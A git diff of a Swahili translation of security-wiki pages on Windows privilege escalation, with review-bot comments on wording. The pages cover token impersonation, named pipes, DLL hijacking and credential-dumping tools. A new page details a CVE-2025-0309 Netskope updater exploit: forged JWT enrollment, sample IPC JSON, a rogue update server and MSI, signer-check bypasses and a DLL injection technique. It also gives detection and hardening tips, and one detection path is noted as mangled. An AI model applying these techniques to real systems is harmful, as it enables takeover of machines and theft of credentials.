@@ -1554,19 +1548,19 @@ Kutoka kwenye High Integrity process unaweza kujaribu ku-enable the AlwaysInstal ### From SeDebug + SeImpersonate to Full Token privileges -Ikiwa una token privileges hizo (huenda utakuta hii katika already High Integrity process), utaweza kufungua almost any process (si protected processes) kwa kutumia SeDebug privilege, copy the token ya process, na ku-create arbitrary process ukiwa na token hiyo.\ -Kwa kutumia technique hii kawaida huchaguliwa process yoyote inayofanya kazi kama SYSTEM yenye token privileges zote (_ndio, unaweza kupata SYSTEM processes bila token privileges zote_).\ +Ikiwa una token privileges hizo (huenda utakutana nazo katika process ambayo tayari iko kwa High Integrity), utaweza **fungua karibu process yoyote** (si protected processes) kwa kutumia SeDebug privilege, **kunakili token** ya process, na kuunda **process yoyote kwa kutumia token hiyo**.\ +Kutumia technique hii kwa kawaida ni **kuchagua process yoyote inayoendesha kama SYSTEM yenye token privileges zote** (_ndio, unaweza kupata SYSTEM processes zisizo na token privileges zote_).\ **You can find an** [**example of code executing the proposed technique here**](sedebug-+-seimpersonate-copy-token.md)**.** ### **Named Pipes** -Teknik hii inatumiwa na meterpreter ku-escalate katika `getsystem`. Teknik inajumuisha ku-create pipe kisha ku-create/abuse service ili kuandika kwenye pipe hiyo. Kisha, server aliyeunda pipe akitumia `SeImpersonate` privilege ataweza impersonate token ya pipe client (service) na kupata SYSTEM privileges.\ -If you want to [**learn more about name pipes you should read this**](#named-pipe-client-impersonation).\ -If you want to read an example of [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md). +Technique hii inatumiwa na meterpreter kupandisha kiwango katika `getsystem`. 
Technique inajumuisha **kuunda pipe na kisha kuunda/kukutumia vibaya service kuandika kwenye pipe hiyo**. Kisha, **server** iliyounda pipe kwa kutumia **`SeImpersonate`** privilege itaweza **kuiga token** ya client wa pipe (service) na kupata SYSTEM privileges.\ +Ikiwa unataka [**learn more about name pipes you should read this**](#named-pipe-client-impersonation).\ +Ikiwa unataka kusoma mfano wa [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md). ### Dll Hijacking -Ikiwa utafanikiwa hijack dll inayopakiwa na process inayoendesha kama SYSTEM utaweza execute arbitrary code kwa ruhusa hizo. Kwa hiyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na moreover, ni rahisi zaidi kufikiwa kutoka kwa high integrity process kwani itakuwa na write permissions kwenye folders zinazotumika kupakia dlls.\ +Ikiwa utafanikiwa **hijack a dll** inayokuwa **loaded** na **process** inayofanya kazi kama **SYSTEM** utaweza kutekeleza arbitrary code kwa ruhusa hizo. Kwa hivyo Dll Hijacking pia ni muhimu kwa aina hii ya privilege escalation, na zaidi, ni **rahisi zaidi kufikiwa kutoka kwa process ya high integrity** kwa sababu itakuwa na **write permissions** kwenye folda zinazotumiwa kupakia dlls.\ **You can** [**learn more about Dll hijacking here**](dll-hijacking/index.html)**.** ### **From Administrator or Network Service to System** 
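Review bot: in the Named Pipes paragraph of this hunk, "kuunda/kukutumia vibaya service" has a typo; "kuunda/kuitumia vibaya service" (create or abuse the service) is meant, and that is the step that makes the SYSTEM service write to the attacker's pipe. In the SeDebug + SeImpersonate paragraph, "utaweza **fungua karibu process yoyote**" needs the infinitive "kufungua" after "utaweza", matching "kunakili" and "kuunda" later in the same sentence. The Dll Hijacking paragraph reads fine.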
@@ -1585,49 +1579,49 @@ Ikiwa utafanikiwa hijack dll inayopakiwa na process inayoendesha kama SYSTEM uta ## Useful tools -**Chombo bora kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) +**Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) **PS** [**PrivescCheck**](https://github.com/itm4n/PrivescCheck)\ -[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- Kagua misconfigurations na mafaili nyeti (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). Imegunduliwa.**\ -[**JAWS**](https://github.com/411Hall/JAWS) **-- Kagua baadhi ya misconfigurations zinazowezekana na kukusanya taarifa (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\ -[**privesc** ](https://github.com/enjoiz/Privesc)**-- Kagua misconfigurations**\ -[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- Inatoa taarifa za PuTTY, WinSCP, SuperPuTTY, FileZilla, na RDP saved sessions. Tumia -Thorough lokali.**\ -[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Inachota credentials kutoka Credential Manager. 
Imegunduliwa.**\ -[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- Piga passwords zilizokusanywa katika domain**\ -[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- Inveigh ni PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer na man-in-the-middle tool.**\ -[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- Uorodheshaji wa msingi wa privesc Windows**\ -[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- Tafuta privesc vulnerabilities zinazoeleweka (DEPRECATED kwa Watson)\ -[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- Michoro ya ndani **(Inahitaji haki za Admin)** +[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- Check for misconfigurations and sensitive files (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). Detected.**\ +[**JAWS**](https://github.com/411Hall/JAWS) **-- Check for some possible misconfigurations and gather info (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\ +[**privesc** ](https://github.com/enjoiz/Privesc)**-- Check for misconfigurations**\ +[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use -Thorough in local.**\ +[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Extracts crendentials from Credential Manager. 
Detected.**\ +[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- Spray gathered passwords across domain**\ +[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.**\ +[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- Basic privesc Windows enumeration**\ +[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- Search for known privesc vulnerabilities (DEPRECATED for Watson)\ +[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- Local checks **(Need Admin rights)** **Exe** -[**Watson**](https://github.com/rasta-mouse/Watson) -- Tafuta privesc vulnerabilities zinazojulikana (inahitaji ku-compile kwa kutumia VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\ -[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Inafanya enumeration ya host kutafuta misconfigurations (zaidi ni tool ya kukusanya taarifa kuliko privesc) (inahitaji ku-compile) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\ -[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Inachota credentials kutoka kwa programu nyingi (exe iliyotengenezwa awali kwenye github)**\ -[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port ya PowerUp kwa C#**\ -[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Kagua misconfiguration (executable imeprecompiled kwenye github). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10.\ -[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Kagua misconfigurations zinazowezekana (exe kutoka python). Haipendekezwi. Haifanyi kazi vizuri kwenye Win10. 
+[**Watson**](https://github.com/rasta-mouse/Watson) -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\ +[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\ +[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Extracts credentials from lots of softwares (precompiled exe in github)**\ +[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port of PowerUp to C#**\ +[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\ +[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations (exe from python). Not recommended. It does not work well in Win10. **Bat** -[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Tool iliyotengenezwa msingi wa post hii (haihitaji accesschk kufanya kazi vizuri lakini inaweza kuitumia). +[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- Tool created based in this post (it does not need accesschk to work properly but it can use it). 
**Local** -[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- Inasoma output ya **systeminfo** na kupendekeza exploits zinazofanya kazi (python za ndani)\ -[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- Inasoma output ya **systeminfo** na kupendekeza exploits zinazofanya kazi (python za ndani) +[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- Reads the output of **systeminfo** and recommends working exploits (local python)\ +[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- Reads the output of **systeminfo** andrecommends working exploits (local python) **Meterpreter** _multi/recon/local_exploit_suggestor_ -You have to compile the project using the correct version of .NET ([see this](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). To see the installed version of .NET on the victim host you can do: +Unapaswa kucompile project kwa kutumia toleo sahihi la .NET ([see this](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). Ili kuona toleo la .NET lililosakinishwa kwenye host ya mwathiri unaweza kufanya: ``` C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line ``` -## Marejeleo +## Marejeo - [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) - [http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738) diff --git a/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md b/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md new file mode 100644 index 000000000..0c558fbdc --- /dev/null +++ b/src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md 
@@ -0,0 +1,123 @@ +# Kutumiwa Vibaya kwa Auto-Updaters za Shirika na IPC zilizo na Vibali (e.g., Netskope stAgentSvc) + +{{#include ../../banners/hacktricks-training.md}} + +Ukurasa huu unazungumzia darasa la Windows local privilege escalation chains zinazopatikana katika endpoint agents na updaters za shirika ambazo zinaonyesha uso wa IPC wa low‑friction na mtiririko wa update wenye vibali. Mfano unaowakilisha ni Netskope Client for Windows < R129 (CVE-2025-0309), ambapo mtumiaji mwenye vibali vya chini anaweza kulazimishwa kujiunga na server inayodhibitiwa na mshambuliaji kisha kuwasilisha MSI ya uharibifu ambayo service ya SYSTEM inaisakinisha. + +Mawazo muhimu unayoweza kutumia dhidi ya bidhaa zinazofanana: +- Abuse a privileged service’s localhost IPC to force re‑enrollment or reconfiguration to an attacker server. +- Implement the vendor’s update endpoints, deliver a rogue Trusted Root CA, and point the updater to a malicious, “signed” package. +- Evade weak signer checks (CN allow‑lists), optional digest flags, and lax MSI properties. +- If IPC is “encrypted”, derive the key/IV from world‑readable machine identifiers stored in the registry. +- If the service restricts callers by image path/process name, inject into an allow‑listed process or spawn one suspended and bootstrap your DLL via a minimal thread‑context patch. + +--- +## 1) Forcing enrollment to an attacker server via localhost IPC + +Wakala wengi hutoa mchakato wa user‑mode UI ambao unazungumza na service ya SYSTEM juu ya localhost TCP kwa kutumia JSON. + +Imeonekana katika Netskope: +- UI: stAgentUI (low integrity) ↔ Service: stAgentSvc (SYSTEM) +- IPC command ID 148: IDP_USER_PROVISIONING_WITH_TOKEN + +Exploit flow: +1) Craft a JWT enrollment token whose claims control the backend host (e.g., AddonUrl). Use alg=None so no signature is required. 
+2) Send the IPC message invoking the provisioning command with your JWT and tenant name: +```json +{ +"148": { +"idpTokenValue": "", +"tenantName": "TestOrg" +} +} +``` +3) Service inaanza kuwasiliana na rogue server yako kwa ajili ya enrollment/config, kwa mfano: +- /v1/externalhost?service=enrollment +- /config/user/getbrandingbyemail + +Vidokezo: +- Ikiwa uthibitishaji wa mtumaji unategemea njia/jina, tuma ombi kutoka kwa vendor binary iliyoorodheshwa kwenye orodha ya kuruhusiwa (angalia §4). + +--- +## 2) Hijacking the update channel to run code as SYSTEM + +Mara client inapozungumza na server yako, tekeleza endpoints zinazotarajiwa na ielekeze kwa attacker MSI. Mfuatano wa kawaida: + +1) /v2/config/org/clientconfig → Rudisha JSON config yenye kipindi kifupi sana cha updater, kwa mfano: +```json +{ +"clientUpdate": { "updateIntervalInMin": 1 }, +"check_msi_digest": false +} +``` +2) /config/ca/cert → Rudisha cheti cha CA katika fomati PEM. Huduma inakisakinisha katika Local Machine Trusted Root store. +3) /v2/checkupdate → Weka metadata inayorejelea MSI haribifu na toleo bandia. + +Bypassing common checks seen in the wild: +- Signer CN allow‑list: huduma inaweza tu kuangalia Subject CN ni “netSkope Inc” au “Netskope, Inc.”. CA yako ya uhalifu inaweza kutoa leaf yenye CN hiyo na kusaini MSI. +- CERT_DIGEST property: jumuisha mali ya MSI isiyoharibu yenye jina CERT_DIGEST. Hakuna utekelezaji wa lazima wakati wa usakinishaji. +- Optional digest enforcement: config flag (e.g., check_msi_digest=false) inazima uthibitishaji wa ziada wa kriptografia. + +Matokeo: service ya SYSTEM inakisakinisha MSI yako kutoka +C:\ProgramData\Netskope\stAgent\data\*.msi +ikitekeleza nambari yoyote kama NT AUTHORITY\SYSTEM. + +--- +## 3) Forging encrypted IPC requests (when present) + +Kutoka R127, Netskope ilifunika IPC JSON katika uwanja encryptData unaoonekana kama Base64. 
Reversing ilionyesha AES yenye key/IV zinazotokana na thamani za registry zinazoweza kusomwa na mtumiaji yeyote: +- Key = HKLM\SOFTWARE\NetSkope\Provisioning\nsdeviceidnew +- IV = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID + +Wavamizi wanaweza kuiga encryption na kutuma amri za IPC zenye encryption halali kutoka kwa mtumiaji wa kawaida. Ushauri wa jumla: ikiwa agent kwa ghafla “inaficha” IPC yake, tazama device IDs, product GUIDs, install IDs chini ya HKLM kama nyenzo za encryption. + +--- +## 4) Bypassing IPC caller allow‑lists (path/name checks) + +Huduma zingine hujaribu kuthibitisha peer kwa kutatua PID ya muunganisho wa TCP na kulinganisha image path/name dhidi ya binaries zilizoorodheshwa za vendor chini ya Program Files (mfano stagentui.exe, bwansvc.exe, epdlp.exe). + +Njia mbili za vitendo: +- DLL injection ndani ya process iliyo kwenye allow‑list (mfano nsdiag.exe) na kushika/proxy IPC kutoka ndani yake. +- Piga kengele binary iliyoorodheshwa ikifufuliwa kwa hali ya suspended na kuanzisha DLL yako ya proxy bila CreateRemoteThread (see §5) ili kutosheleza sheria zilizotekelezwa na driver kuzuia tampering. + +--- +## 5) Tamper‑protection friendly injection: suspended process + NtContinue patch + +Products mara nyingi huja na minifilter/OB callbacks driver (mfano Stadrv) inayokata haki hatari kutoka kwa handles za processes zilizo na ulinzi: +- Process: inatoa mazingira kama PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME +- Thread: inazuia hadi THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE + +Loader ya user‑mode inayotegemewa na kuheshimu vikwazo hivi: +1) CreateProcess ya vendor binary na CREATE_SUSPENDED. +2) Pata handles ambazo bado unaruhusiwa: PROCESS_VM_WRITE | PROCESS_VM_OPERATION kwa process, na thread handle yenye THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (au tu THREAD_RESUME ikiwa unatayarisha code kwenye RIP inayojulikana). 
+3) Andika juu ya ntdll!NtContinue (au thunk nyingine ya mapema, iliyoorodheshwa kwa hakika) kwa stub ndogo inayopiga LoadLibraryW kwenye path ya DLL yako, kisha kuruka kurudi. +4) ResumeThread ili kuamsha stub yako ndani ya process, ikipakia DLL yako. + +Kwa sababu haukutumia PROCESS_CREATE_THREAD au PROCESS_SUSPEND_RESUME kwenye process iliyokuwa tayari na ulinzi (uliiunda wewe), sera ya driver inatimizwa. + +--- +## 6) Practical tooling +- NachoVPN (Netskope plugin) inaendesha otomatiki rogue CA, kusaini MSI haribifu, na kutumika kupeana endpoints zinazohitajika: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate. +- UpSkope ni custom IPC client inayotengeneza ujumbe wowote wa IPC (hiari kwa AES‑encryption) na inajumuisha suspended‑process injection ili asili iwe kutoka kwa binary iliyoorodheshwa. + +--- +## 7) Detection opportunities (blue team) +- Simamia uongezaji wa Local Machine Trusted Root. Sysmon + registry‑mod eventing (see SpecterOps guidance) hufanya kazi vizuri. +- Tambua utekelezaji wa MSI ulioanzishwa na service ya agent kutoka paths kama C:\ProgramData\\\data\*.msi. +- Angalia logs za agent kwa hosts/tenants zisizotarajiwa za enrollment, kwa mfano: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log – tafuta addonUrl / tenant anomalies na provisioning msg 148. +- Toa alarm juu ya localhost IPC clients ambao si binaries zilizotarajiwa kusainiwa, au wanaotokana na miti ya child process isiyo ya kawaida. + +--- +## Hardening tips for vendors +- Gana enrollment/update hosts kwa allow‑list kali; kataa domains zisizo salama katika clientcode. +- Thibitisha IPC peers kwa primitives za OS (ALPC security, named‑pipe SIDs) badala ya ukaguzi wa image path/name. +- Weka nyenzo za siri nje ya HKLM zinazosomeka kwa wote; ikiwa IPC lazima iwe encrypted, zaa keys kutoka kwa siri zilizo na ulinzi au zigadilishe juu ya channels zilizo thibitishwa. 
+- Tendea updater kama uso wa supply‑chain: hitaji mnyororo kamili hadi CA uamiliki, thibitisha signatures za package dhidi ya pinned keys, na fail closed ikiwa validation imezimwa katika config. + +## References +- [Advisory – Netskope Client for Windows – Local Privilege Escalation via Rogue Server (CVE-2025-0309)](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/) +- [NachoVPN – Netskope plugin](https://github.com/AmberWolfCyber/NachoVPN) +- [UpSkope – Netskope IPC client/exploit](https://github.com/AmberWolfCyber/UpSkope) +- [NVD – CVE-2025-0309](https://nvd.nist.gov/vuln/detail/CVE-2025-0309) + +{{#include ../../banners/hacktricks-training.md}}
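Review bot: The MSI detection path in §7 ("Detection opportunities") is mangled: `C:\ProgramData\\\data\*.msi` has a tripled backslash and has lost the directory components that §2 spells out as `C:\ProgramData\Netskope\stAgent\data\*.msi`, so a defender copying the glob into a Sysmon or EDR rule would match nothing. Either restore the full path from §2 or, if a vendor-neutral pattern is intended, write it with an explicit placeholder such as `C:\ProgramData\<vendor>\<agent>\data\*.msi`. Two smaller points in the same hunk: the five bullets under "Mawazo muhimu unayoweza kutumia dhidi ya bidhaa zinazofanana:" and the "Exploit flow:" and "Bypassing common checks seen in the wild:" lead-ins are left in English while the surrounding text is Swahili (and "Piga kengele binary" in §4 reads as a literal rendering of "spawn"; "Anzisha binary" would carry the meaning), and the "(see SpecterOps guidance)" pointer in §7 has no corresponding entry in the References list, so the reader has nothing to follow.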